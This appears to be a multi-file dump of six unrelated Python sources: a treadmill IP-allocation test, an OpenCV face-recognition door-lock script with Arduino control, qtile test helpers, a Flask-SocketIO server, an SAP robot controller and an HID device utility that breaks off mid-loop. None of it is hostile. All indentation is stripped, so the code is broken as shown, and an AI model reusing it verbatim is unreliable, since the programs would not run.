from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import threading
import unittest
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import six
from treadmill import vipfile
class VipFileTest(unittest.TestCase):
"""Tests for teadmill.rulefile."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.vips_dir = os.path.join(self.root, 'vips')
owner_dirs = os.path.join(self.root, 'owners')
os.mkdir(owner_dirs)
for owner in six.moves.range(0, 15):
with io.open(os.path.join(owner_dirs, str(owner)), 'w'):
pass
self.vips = vipfile.VipMgr(self.vips_dir, owner_dirs)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_alloc(self):
"""Verifies that vips are allocated atomically with no duplicates."""
vips = set()
def alloc_thread(idx):
"""Allocate container ip."""
ip0 = self.vips.alloc(str(idx))
vips.add(ip0)
threads = []
for i in range(0, 15):
threads.append(threading.Thread(target=alloc_thread, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(len(threads), len(vips))
def test_free(self):
"""Tests freeing the resource."""
owner = '3'
ip0 = self.vips.alloc(owner)
self.assertTrue(os.path.exists(os.path.join(self.vips_dir, ip0)))
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
# Calling free twice is noop.
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
if __name__ == '__main__':
unittest.main()
|
face_recognition.py
|
#
# Face Recognition authorisation
# An OpenCV based Local Binary Pattern Histogram (LBPH) face Recognition
# authorisation system with arduino support for door locks.
#
# created by Rajas Chavadekar on 03.08.2020, Pune, India
# github.com/rvcgeeks linkedin.com/in/rvchavadekar
#
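# Usage (inferred from the argv handling below; paths are relative to the
# working directory and the Haar cascade XML must be present):
#   python face_recognition.py g <face_id>   gather ~200 face samples into dataset/<face_id>/
#   python face_recognition.py t             train the LBPH model and save it as model.yml
#   python face_recognition.py r             recognize faces live and drive the Arduino lock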
import cv2, os
from sys import argv
face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if argv[1] == 'g':
try:
int(argv[2])
except ValueError:
print('face_id must be integer!')
quit(1)
os.mkdir('dataset/' + argv[2])
vid_cam = cv2.VideoCapture(0)
count = 0
while(True):
_ , image_frame = vid_cam.read()
gray = cv2.cvtColor(image_frame, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(image_frame, (x, y), (x + w, y + h), (255,0,0), 2)
cv2.imwrite('dataset/' + argv[2] + '/' + str(count) + '.jpg', gray[y : y + h, x : x + w])
cv2.imshow('frame', image_frame)
count += 1
if cv2.waitKey(100) & 0xFF == ord('q') or count > 200:
break
vid_cam.release()
cv2.destroyAllWindows()
elif argv[1] == 't':
import numpy as np
from PIL import Image
recognizer = cv2.face.LBPHFaceRecognizer_create()
face_imgs, ids = [], []
for face_id in os.listdir('dataset'):
for sample in os.listdir('dataset/' + face_id):
path = 'dataset/' + face_id + '/' + sample
print('processing : ' + path)
PIL_img = Image.open(path).convert('L')
numpy_img = np.array(PIL_img,'uint8')
faces = face_detector.detectMultiScale(numpy_img)
for (x, y, w, h) in faces:
face_imgs.append(numpy_img[y : y + h, x : x + w])
ids.append(int(face_id))
recognizer.train(face_imgs, np.array(ids))
recognizer.save('model.yml')
elif argv[1] == 'r':
board = None
try:
from pyfirmata import Arduino
if os.name == 'nt':
board = Arduino('COM3')
else:
board = Arduino('/dev/ttyACM0') # burn StandardFirmata (Arduino IDE -> Examples -> Firmata -> StandardFirmata) onto the board first
except Exception as e:
print(str(e) + '\nBOARD NOT WORKING')
board_is_active = 0
def board_start():
global board_is_active
if board:
# DO ARDUINO ACTIONS AFTER STARTING BOARD HERE
board.digital[12].write(1)
board.digital[13].write(0)
board_is_active = 0
def board_stop():
global board_is_active
if board:
# DO ARDUINO ACTIONS BEFORE STOPPING BOARD HERE
board.digital[12].write(0)
board.digital[13].write(0)
board_is_active = 0
from time import sleep
def board_if_success():
global board_is_active
if board:
# DO ARDUINO ACTIONS IF VERIFIED HERE
board.digital[12].write(0)
board.digital[13].write(1)
sleep(2)
board.digital[12].write(1)
board.digital[13].write(0)
board_is_active = 0
from threading import Thread
def launch_board_action(action):
global board_is_active
if board_is_active == 0:
board_is_active = 1
t = Thread(target = action)
t.daemon = True
t.start()
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read('model.yml')
font = cv2.FONT_HERSHEY_SIMPLEX
vid_cam = cv2.VideoCapture(0)
FACE_CONFD_THRESHOLD = 50 # percent
board_start()
while True:
ret, im = vid_cam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.2, 5)
for (x, y, w, h) in faces:
face_id, distrust = recognizer.predict(gray[y : y + h, x : x + w])
confidence = 100 - distrust
caption = '%s -> %s' % (face_id, round(confidence, 2))
if confidence >= FACE_CONFD_THRESHOLD:
launch_board_action(board_if_success)
rect_col = (0, 255, 0)
else:
rect_col = (0, 0, 255)
cv2.rectangle(im, (x - 20, y - 20), (x + w + 20, y + h + 20), rect_col, 4)
cv2.rectangle(im, (x - 22, y - 90), (x + w + 22, y - 22), rect_col, -1)
cv2.putText(im, caption, (x, y - 40), font, 1, (255, 255, 255), 3)
cv2.imshow('im', im)
if cv2.waitKey(10) & 0xFF == ord('q'):
break
vid_cam.release()
cv2.destroyAllWindows()
board_stop()
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import logging.handlers
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log, logger
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
def __init__(
self,
fail_msg="retry failed!",
ignore_exceptions=(),
dt=sleep_time,
tmax=max_sleep,
return_on_fail=False,
):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
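# Minimal usage sketch (the decorated function here is hypothetical): retry a
# flaky check, ignoring the named exceptions, until tmax seconds have elapsed.
#
#     @Retry(ignore_exceptions=(RuntimeError,), fail_msg="window never appeared")
#     def wait_for_window(client):
#         if not client.windows():
#             raise RuntimeError("not here yet")
#         return True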
class BareConfig(Config):
auto_fullscreen = True
groups = [config.Group("a"), config.Group("b"), config.Group("c"), config.Group("d")]
layouts = [layout.stack.Stack(num_stacks=1), layout.stack.Stack(num_stacks=2)]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == "OK":
return True
return False
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
with various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level)
if hasattr(self, "log_queue"):
logger.addHandler(logging.handlers.QueueHandler(self.log_queue))
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg="Window never appeared...")
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError("window is still in client list!")
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal", export_sni=False):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Setting `export_sni` to True will publish a simplified StatusNotifierItem interface
on DBus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
args = [python, path, "--name", wmclass, name, wm_type]
if export_sni:
args.append("export_sni_interface")
return self._spawn_window(*args)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError("Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
@Retry(ignore_exceptions=(AssertionError,), fail_msg="Window did not die!")
def assert_window_died(client, window_info):
client.sync()
wid = window_info["id"]
assert wid not in set([x["id"] for x in client.windows()])
|
server.py
|
#!/usr/bin/python3
import os
import time
import queue
import eventlet
import threading
from flask import Flask, render_template, request, send_from_directory, Response, send_file
from flask_socketio import SocketIO
statusQueue = eventlet.Queue()
app = Flask(__name__, static_url_path="")
socketio = SocketIO(app, engineio_logger=True, async_mode='threading')
#socketio = SocketIO(app, engineio_logger=True, async_mode="eventlet")
def ack():
print("< Message sent was received!")
#
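# emitStatus is the consumer half of a simple producer/consumer pattern:
# threadRunnable (below) puts a status dict on statusQueue every 2 seconds,
# and this background task drains the queue and broadcasts each packet to all
# connected Socket.IO clients on the "clientstatus" event.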
def emitStatus():
print("Beginning to emit ...")
while True:
msg = statusQueue.get()
print("> Sending status packet: " + str(msg))
socketio.emit("clientstatus", msg, callback=ack, broadcast=True)
statusQueue.task_done()
print("> Sending status packet done.")
print("Terminated.")
#
socketio.start_background_task(emitStatus)
def threadRunnable():
stateID = 0
while True:
msg = {
"stateID": stateID,
}
print(">", end="", flush=True)
#print("Adding status packet to queue: " + str(msg))
statusQueue.put(msg)
time.sleep(2)
stateID += 1
#
thread = threading.Thread(target = threadRunnable)
thread.start()
@app.route("/<path>", methods=["GET", "POST"])
def sendData1(path):
# print(path)
return send_from_directory('wwwroot', path)
#
@app.route("/", methods=["GET", "POST"])
def sendIndex():
return send_file("wwwroot/index.html", mimetype="text/html")
#
@socketio.on("myws")
def handle_myEvent(message):
print("< Message received: " + str(message))
#
if __name__ == '__main__':
socketio.run(app, host='0.0.0.0', port=3000)
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""FetchCore robot controller."""
import logging
import datetime
import sys
import threading
import traceback
from copy import deepcopy
from typing import Dict
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .fetchrobot import FetchRobots
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""FetchCore robot controller."""
def __init__(self, fetch_robots: FetchRobots) -> None:
"""Construct."""
# Instance with all FetchCore robots
self._fetch_robots = fetch_robots
self.robottypes: Dict[str, bool] = {}
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Create instance for robottypes CR
template_robottype_cr = get_sample_cr('robco_robottype')
self.robottype_controller = K8sCRHandler(
'registry.cloudrobotics.com',
'v1alpha1',
'robottypes',
'default',
template_robottype_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
# register callbacks
self.robottype_controller.register_callback(
'robot', ['ADDED', 'MODIFIED', 'REPROCESS'], self.robottype_cb)
self.register_callback(
'robot', ['ADDED', 'REPROCESS'], self.robot_cb)
self.register_callback(
'robot_deleted', ['DELETED'], self.robot_deleted_cb)
def robot_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# If the Fetch robot is not yet in the FetchCore watch list, add it
try:
self._fetch_robots.get_robot(name)
except ValueError:
self._fetch_robots.add_robot(name)
_LOGGER.info('Added robot %s to FetchCore watch list', name)
def robot_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot delete CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Remove robot from FetchCore watch list
self._fetch_robots.remove_robot(name)
_LOGGER.info('Removed robot %s from FetchCore watch list', name)
def robottype_cb(self, name: str, custom_res: Dict) -> None:
"""Process robottype CR callback data."""
self.robottypes[name] = bool(custom_res.get('spec', {}).get('make') == 'fetch')
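# Example (a sketch; the CR name is hypothetical): a robottype CR named
# 'freight100' with spec.make == 'fetch' sets self.robottypes['freight100']
# to True, so robot CRs of that type get added to the FetchCore watch list
# by robot_cb.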
def run(self, watcher: bool = True, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
# Initial load of robot types
robot_type_crs = self.robottype_controller.list_all_cr()
if robot_type_crs:
for custom_res in robot_type_crs['items']:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robottype_cb(name, custom_res)
# Initial load of robots
robot_crs = self.list_all_cr()
if robot_crs:
for custom_res in robot_crs['items']:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robot_cb(name, custom_res)
# Initial load from FetchCore
self._fetch_robots.update()
# Start watcher threads
self.robottype_controller.run(watcher, reprocess, multiple_executor_threads)
super().run(watcher, reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
# Stop robottype and robot watchers
self.robottype_controller.stop_watcher()
super().stop_watcher()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
_LOGGER.error(
'%s/%s: Error watching robot status - Exception: "%s" / "%s" - '
'TRACEBACK: %s', self.group, self.plural, exc_info[0], exc_info[1],
traceback.format_exception(*exc_info))
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = exc
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Continously update status of robot CR."""
status = deepcopy(self.robot_template_cr)['status']
# Get updated robot states from FetchCore
self._fetch_robots.update()
# Update robot CR status
for name, robot in self._fetch_robots.robots.items():
status['configuration']['trolleyAttached'] = robot.trolley_attached
status['robot']['batteryPercentage'] = robot.battery_percentage
status['robot']['lastStateChangeTime'] = robot.last_state_change
status['robot']['state'] = robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(name, status)
except ApiException:
_LOGGER.error('Status CR of robot %s could not be updated', name)
|
bsl2.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
# import include_dll_path
import hid
# import os
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
PRODUCT_ID_CTAG = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
INSERTION_INDEX = 2 + 8
TORQUE_INDEX = 2 + 4
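# Index arithmetic summary (derived from the constants above): bytes 0-1 are
# a header and bytes 2-5 the firmware version, so START_INDEX == 6; the
# 16-bit analog channels are read little-endian at ANALOG_INDEX_LIST ==
# [8, 10, ..., 22]; COUNTER_INDEX == 2 + 22 + 18 == 42; TORQUE_INDEX == 6
# and INSERTION_INDEX == 10.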
HID_STREAM_CHANNEL1_STYLE = "HIDStreamChannel1"
HID_STREAM_CHANNEL2_STYLE = "HIDStreamChannel2"
INNER_HANDLE_CHANNEL1_STYLE = "InnerHandleChannel1"
INNER_HANDLE_CHANNEL2_STYLE = "InnerHandleChannel2"
CLICKER_STYLE = "Clicker"
SLEEPTIMER_STYLE = "sleepTimer"
BATTERY_LEVEL_STYLE = "batteryLevel"
MOTOR_CURRENT_STYLE = "motorCurrent"
style_names = [
HID_STREAM_CHANNEL1_STYLE,
HID_STREAM_CHANNEL2_STYLE,
INNER_HANDLE_CHANNEL1_STYLE,
INNER_HANDLE_CHANNEL2_STYLE,
CLICKER_STYLE,
SLEEPTIMER_STYLE,
BATTERY_LEVEL_STYLE,
MOTOR_CURRENT_STYLE
]
# global variables
progressbar_styles = list()
progressbars = list()
inner_clicker = list()
red_handle = list()
reset_check = list()
counter_entry = list()
clicker_counter_entry = list()
fault_entry = list()
special_cmd = 0
ignore_red_handle_button = None
ignore_red_handle_checkbutton = None
ignore_red_handle_state = False
root = None
def update_checkbox(checkbox, bool_value):
if (bool_value):
checkbox.select()
else:
checkbox.deselect()
def streaming_button_CallBack():
global special_cmd
global ignore_red_handle_state
special_cmd = 'I'
ignore_red_handle_state = True
def board_type_button_callback():
global special_cmd
special_cmd = 'S'
def alive_button_CallBack():
global special_cmd
special_cmd = 'A'
def moderate_button_CallBack():
global special_cmd
special_cmd = 'M'
def BSL_mode_button_CallBack():
global special_cmd
special_cmd = 'B'
def gui_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
global WRITE_DATA
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
elif special_cmd == 'B':
WRITE_DATA = WRITE_DATA_CMD_B
device.write(WRITE_DATA)
print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
# # device.write(WRITE_DATA)
if WRITE_DATA == WRITE_DATA_CMD_B:
break
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
        sleep_time = SLEEP_AMOUNT - cycle_time  # currently unused: the sleep() call below stayed commented out
# if (timer() - time) < SLEEP_AMOUNT:
# if value:
# prev_cnt = cnt
# cnt = value[COUNTER_INDEX]
# if prev_cnt and cnt < prev_cnt:
# print("Invalid counter")
# sleep(SLEEP_AMOUNT)
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
